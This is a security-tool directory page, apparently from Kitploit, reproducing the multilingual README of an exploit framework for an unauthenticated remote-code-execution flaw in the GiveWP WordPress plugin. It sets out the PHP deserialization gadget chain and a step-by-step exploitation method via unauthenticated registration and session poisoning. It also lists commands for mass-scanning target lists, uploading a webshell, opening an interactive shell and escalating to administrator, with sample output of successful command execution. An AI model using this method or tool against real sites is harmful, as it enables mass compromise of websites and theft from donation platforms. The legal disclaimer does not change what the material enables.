Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-82222 — # Marco de explotación para CVE-2026-82222, un RCE no autenticado en el plugin GiveWP de WordPress. Admite escaneo masivo, detección automática, multitarea, salida JSON/TXT y shell interactivo para pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/ghostlyrootb2h/cve-2026-82222
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHub
ghostlyrootb2h/cve-2026-82222

CVE-2026-82222

# Marco de explotación para CVE-2026-82222, un RCE no autenticado en el plugin GiveWP de WordPress. Admite escaneo masivo, detección automática, multitarea, salida JSON/TXT y shell interactivo para pruebas autorizadas.

Ver Repositorio
hace 7h 38mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

⚡ GHOSTLYR00T - GiveWP RCE Exploit Framework

Python Version License Author CVE CVSS

CVE-2026-82222 - GiveWP Unauthenticated RCE Exploit
Mass Scanner + Auto-Detection + Multi-Threading + Interactive Shell


📋 Daftar Isi | Tabla de Contenidos

  • Overview
  • Fitur Utama | Características Principales
  • Detalles de la Vulnerabilidad
  • Instalasi | Instalación
  • Parameter Lengkap | Parámetros Completos
  • Contoh Penggunaan | Ejemplos
  • Hasil Scan | Resultados del Escaneo
  • Cómo Funciona
  • FAQ
  • Peringatan | Advertencia
  • Lisensi | Licencia

  • 🎯 Overview

    GHOSTLYR00T es un framework de explotación para CVE-2026-82222, una vulnerabilidad de inyección de objetos PHP en el plugin GiveWP de WordPress que permite ejecución remota de código (RCE) sin autenticación. Esta herramienta admite escaneo masivo, detección automática y shell interactiva.

    🔴 CVSS 9.8 - CRÍTICO

    Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H


    🚀 Fitur Utama | Características Principales

    🇮🇩 Bahasa Indonesia

    FiturDeskripsi
    Mass ScanScan ratusan target dari file (-f targets.txt)
    Auto-DetectionDeteksi otomatis form ID, gateway, dan amount donasi
    Multi-ThreadingScan paralel dengan thread configurable (--threads)
    Check ModeFingerprint cepat tanpa exploit (--check)
    JSON OutputExport hasil ke JSON (--json)
    TXT OutputExport hasil ke TXT ringkas (--txt)
    Interactive ShellUpload webshell + terminal interaktif
    Admin EscalationAuto-escalate user ke administrator
    Progress BarMonitor real-time proses scanning
    Colored OutputOutput dengan warna dan format profesional

    🇬🇧 English

    FeatureDescription
    Mass ScanScan hundreds of targets from file (-f targets.txt)
    Auto-DetectionAuto-detects form ID, gateway, and donation amount
    Multi-ThreadingParallel scanning with configurable threads
    Check ModeFast fingerprint without exploitation (--check)
    JSON OutputExport results to JSON (--json)
    TXT OutputExport results to TXT (--txt)
    Interactive ShellUpload webshell + interactive terminal
    Admin EscalationAuto-escalate user to administrator
    Progress BarReal-time scan progress monitoring
    Colored OutputProfessional colored terminal output

    🔍 Detalles de la Vulnerabilidad

    CVE-2026-82222 - GiveWP Unauthenticated RCE

    AspekDetail
    Affected VersionsGiveWP <= 4.16.7.1
    Patched VersionsGiveWP >= 4.16.7.2
    Attack VectorNetwork (AV:N)
    Privileges RequiredNone (PR:N)
    ImpactComplete System Compromise

    Cadena POP:

    root@kitploit:~
    TCPDF::__destruct()
      -> TCPDF::_destroy(true)
        -> foreach ($this->imagekeys as $file)
          -> Symfony Session::getIterator()
            -> Session::getBag($this->attributeName)
              -> $this->storage->getBag($attributeName)
                -> DonationFactory->__call('getBag', [$attributeName])
                  -> call_user_func_array('system', [$attributeName])
    

    📦 Instalasi | Instalación

    🇮🇩 Bahasa Indonesia

    🔧 Persyaratan Sistem

    • OS: Linux / Windows / MacOS
    • Python: Versi 3.8 atau lebih baru
    • Library: requests, urllib3

    📥 Langkah Instalasi

    root@kitploit:~
    # 1. Clone repository
    git clone https://github.com/GhostlyrootB2H/GHOSTLYR00T.git
    cd GHOSTLYR00T
    
    # 2. Install dependencies
    pip install requests urllib3
    
    # 3. Tes apakah berhasil
    python3 poc.py -h
    

    🇬🇧 English

    🔧 System Requirements

    • OS: Linux / Windows / MacOS
    • Python: Version 3.8 or higher
    • Libraries: requests, urllib3

    📥 Installation Steps

    root@kitploit:~
    # 1. Clone repository
    git clone https://github.com/GhostlyrootB2H/GHOSTLYR00T.git
    cd GHOSTLYR00T
    
    # 2. Install dependencies
    pip install requests urllib3
    
    # 3. Test if successful
    python3 poc.py -h
    

    🎯 Parameter Lengkap | Parámetros Completos

    🇮🇩 Bahasa Indonesia

    ParameterFungsiContoh
    -f, --fileFile target (batch mode)-f targets.txt
    --threadsJumlah thread (default: 4)--threads 10
    --jsonExport hasil ke JSON--json hasil.json
    --txtExport hasil ke TXT--txt hasil.txt
    -c, --commandCommand yang dieksekusi-c "id"
    -g, --gatewayForce gateway tertentu-g stripe
    -a, --amountForce amount donasi-a 25.00
    -t, --triggersRetry attempts (default: 4)-t 5
    --timeoutTimeout per request (default: 30s)--timeout 60
    --checkFingerprint only--check
    --upload-shellUpload webshell--upload-shell
    -i, --interactiveInteractive terminal-i
    -v, --verboseVerbose output-v
    --no-colorDisable colored output--no-color

    🇬🇧 English

    ParameterFunctionExample
    -f, --fileTarget file (batch mode)-f targets.txt
    --threadsNumber of threads (default: 4)--threads 10
    --jsonExport results to JSON--json results.json
    --txtExport results to TXT--txt results.txt
    -c, --commandCommand to execute-c "id"
    -g, --gatewayForce specific gateway-g stripe
    -a, --amountForce donation amount-a 25.00
    -t, --triggersRetry attempts (default: 4)-t 5
    --timeoutRequest timeout (default: 30s)--timeout 60
    --checkFingerprint only--check
    --upload-shellUpload webshell--upload-shell
    -i, --interactiveInteractive terminal-i
    -v, --verboseVerbose output-v
    --no-colorDisable colored output--no-color

    🔥 Contoh Penggunaan | Ejemplos

    🇮🇩 Bahasa Indonesia

    1. Single Target

    root@kitploit:~
    python3 poc.py https://target.com -c "id"
    

    2. Batch Scan (Check Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt --check --txt hasil_check.txt
    

    3. Batch Scan (Exploit Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt -c "id" --threads 5 --json hasil.json --txt hasil.txt
    

    4. Interactive Shell

    root@kitploit:~
    python3 poc.py https://target.com -c "id" --upload-shell -i
    

    5. Verbose Mode

    root@kitploit:~
    python3 poc.py https://target.com -c "id" -v
    

    🇬🇧 English

    1. Single Target

    root@kitploit:~
    python3 poc.py https://target.com -c "id"
    

    2. Batch Scan (Check Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt --check --txt check_results.txt
    

    3. Batch Scan (Exploit Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt -c "id" --threads 5 --json results.json --txt results.txt
    

    4. Interactive Shell

    root@kitploit:~
    python3 poc.py https://target.com -c "id" --upload-shell -i
    

    5. Verbose Mode

    root@kitploit:~
    python3 poc.py https://target.com -c "id" -v
    

    📊 Hasil Scan | Resultados del Escaneo

    🇮🇩 Bahasa Indonesia

    Terminal Output (Berhasil Exploit)

    root@kitploit:~
    CVE-2026-82222  GiveWP <= 4.16.7.1  unauthenticated RCE  |  PoC v2.2
        target   : https://target.com
        form id  : auto-discover
        command  : id
    
    root@kitploit:~
    + GiveWP 4.15.4 detected (vulnerable).
    + User "a1788868506" registered.
    + Gadget stored in account meta.
    + Discovered 13 form(s).
    + Success! Form 37256 / gateway paypal / amount 1.00
    + Session poisoned (HTTP 500).
    +--- command output --------------------------------------------
    | uid=33(www-data) gid=33(www-data) groups=33(www-data)
    +---------------------------------------------------------------
    

    [+] SUCCESS. The target executed the command.

    TXT Output (Check Mode)

    root@kitploit:~
    # GiveWP Vulnerability Scan Results (Fingerprint Mode)
    # Generated: 2026-09-09 12:00:00
    # Total: 10 | Vulnerable: 4 | Exploited: 0 | Failed: 6
    #
    # Format: TARGET | VERSION | STATUS
    #
    https://target1.com | 4.15.4 | VULNERABLE
    https://target2.com | 4.14.6 | VULNERABLE
    

    JSON Output

    root@kitploit:~
    {
      "timestamp": 1694265600,
      "mode": "exploit",
      "total": 10,
      "vulnerable": 4,
      "exploited": 3,
      "failed": 7,
      "results": [
        {
          "target": "https://target1.com",
          "status": "exploited",
          "version": "4.15.4",
          "command_output": "uid=33(www-data) gid=33(www-data)"
        }
      ]
    }
    

    🇬🇧 English

    Terminal Output (Successful Exploit)

    root@kitploit:~
    CVE-2026-82222  GiveWP <= 4.16.7.1  unauthenticated RCE  |  PoC v2.2
        target   : https://target.com
        form id  : auto-discover
        command  : id
    
    root@kitploit:~
    + GiveWP 4.15.4 detected (vulnerable).
    + User "a1788868506" registered.
    + Gadget stored in account meta.
    + Discovered 13 form(s).
    + Success! Form 37256 / gateway paypal / amount 1.00
    + Session poisoned (HTTP 500).
    +--- command output --------------------------------------------
    | uid=33(www-data) gid=33(www-data) groups=33(www-data)
    +---------------------------------------------------------------
    

    [+] SUCCESS. The target executed the command.


    ⚙️ Cómo Funciona

    🇮🇩 Bahasa Indonesia

    Explotación Paso a Paso:

    1. Fingerprint: Detecta la versión de GiveWP vía readme.txt y give.php
    2. Registro: Crea una cuenta de donante sin autenticación vía give_action=user_register
    3. Almacenamiento del Payload: Guarda el objeto PHP serializado en los metadatos last_name
    4. Descubrimiento de Formularios: Encuentra formularios de donación vía API REST y scraping
    5. Auto-Detección de Gateway/Monto: Prueba combinaciones de gateway y monto hasta tener éxito
    6. Envenenamiento de Sesión: Envía una donación sin el campo give_last para activar la deserialización
    7. Disparo y Captura: Accede a la sesión para revivir el payload y capturar la salida

    Lógica de Auto-Detección:

    root@kitploit:~
    # Gateway detection order
    CANDIDATE_GATEWAYS = ['manual', 'offline', 'paypal', 'stripe', 'square',
                          'paypalexpress', 'authorize', 'razorpay', 'mollie']
    

    Amount detection order

    AMOUNT_TESTS = ['0.01', '1.00', '5.00', '10.00', '25.00', '50.00', '100.00', '250.00', '500.00']

    🇬🇧 English

    Step-by-step Exploitation:

    1. Fingerprint: Detects GiveWP version via readme.txt and give.php
    2. Registration: Creates donor account via give_action=user_register
    3. Payload Storage: Stores serialized PHP object in last_name metadata
    4. Form Discovery: Finds donation forms via REST API and scraping
    5. Gateway/Amount Auto-Detection: Tests combinations until successful
    6. Session Poisoning: Submits donation without give_last to trigger deserialization
    7. Trigger & Capture: Accesses session to revive payload and capture output

    ❓ FAQ

    🇮🇩 Bahasa Indonesia

    PertanyaanJawaban
    Versi GiveWP apa yang rentan?GiveWP <= 4.16.7.1. Versi 4.16.7.2 dan di atasnya sudah patched.
    Kenapa harus -a 25?Beberapa form punya minimum amount (misal $25). Tools auto-detect, tapi bisa di-force.
    Bisa digunakan di production?TIDAK. Hanya untuk authorized testing.
    Kenapa registrasi gagal (HTTP 200)?Target mungkin registrasi dimatikan, WAF aktif, atau versi 4.16.6+.

    🇬🇧 English

    QuestionAnswer
    Which GiveWP versions are vulnerable?GiveWP <= 4.16.7.1. Version 4.16.7.2 and above are patched.
    Why use -a 25?Some forms have minimum amounts. Tool auto-detects, but can be forced.
    Can this be used in production?NO. For authorized testing only.
    Why registration fails (HTTP 200)?Target may have registration disabled, WAF active, or version 4.16.6+.

    ⚠️ Peringatan | Warning

    ⚠️ PERINGATAN HUKUM ⚠️

    TOOLS INI HANYA UNTUK PENELITIAN KEAMANAN!


    ⚠️ Ilegal: Mengakses server tanpa izin = tindak pidana
    ⚠️ UU ITE: Melanggar Pasal 30-32 tentang akses ilegal
    ⚠️ Hanya untuk: Pengujian sistem sendiri atau dengan izin tertulis
    ⚠️ Tanggung Jawab: Pengguna bertanggung jawab penuh atas penggunaan tools ini

    GUNAKAN DENGAN BIJAK DAN BERTANGGUNG JAWAB!

    ⚠️ LEGAL WARNING ⚠️

    THIS TOOL IS FOR SECURITY RESEARCH ONLY!


    ⚠️ Illegal: Accessing servers without permission = criminal offense
    ⚠️ Legal Risk: Violates computer fraud laws
    ⚠️ Authorized use only: Testing your own systems or with written permission
    ⚠️ Responsibility: Users are fully responsible for their use of this tool

    USE WISELY AND RESPONSIBLY!


    📜 Lisensi | License

    🇮🇩 Bahasa Indonesia

    Copyright © 2026 GhostlyrootB2H
    Didistribusikan di bawah lisensi MIT.

    🇬🇧 English

    Copyright © 2026 GhostlyrootB2H
    Distributed under the MIT License.


    👨‍💻 Author

    GhostlyrootB2H

    🐙 GitHub: @GhostlyrootB2H

    🇮🇩 Terima kasih telah menggunakan GHOSTLYR00T!
    Tools ini untuk pembelajaran dan pengujian keamanan.
    Jangan gunakan untuk aktivitas ilegal!

    🇬🇧 Thank you for using GHOSTLYR00T!
    For learning and security testing only.
    Do not use for illegal activities!

    Descargar herramienta